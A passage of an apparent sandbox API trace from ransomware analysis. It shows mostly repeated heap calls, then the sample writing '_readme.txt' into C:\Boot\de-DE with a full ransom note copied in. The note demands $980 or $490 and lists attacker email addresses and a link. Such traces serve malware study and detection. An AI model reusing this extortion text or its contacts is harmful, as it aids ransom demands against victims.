(HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.433] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.433] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.434] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.434] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.434] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.434] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.434] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.434] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.434] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.434] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.434] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.434] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.434] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.434] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.434] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.434] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.434] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.435] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.435] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.436] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.436] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.437] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.437] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.438] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.439] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.439] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.440] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.440] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.441] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.441] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0227.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.441] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.441] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.441] PathFindFileNameW (pszPath="") returned="" [0227.441] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.441] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.442] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.442] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.442] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.442] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0227.442] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.442] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.442] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0227.443] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.443] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 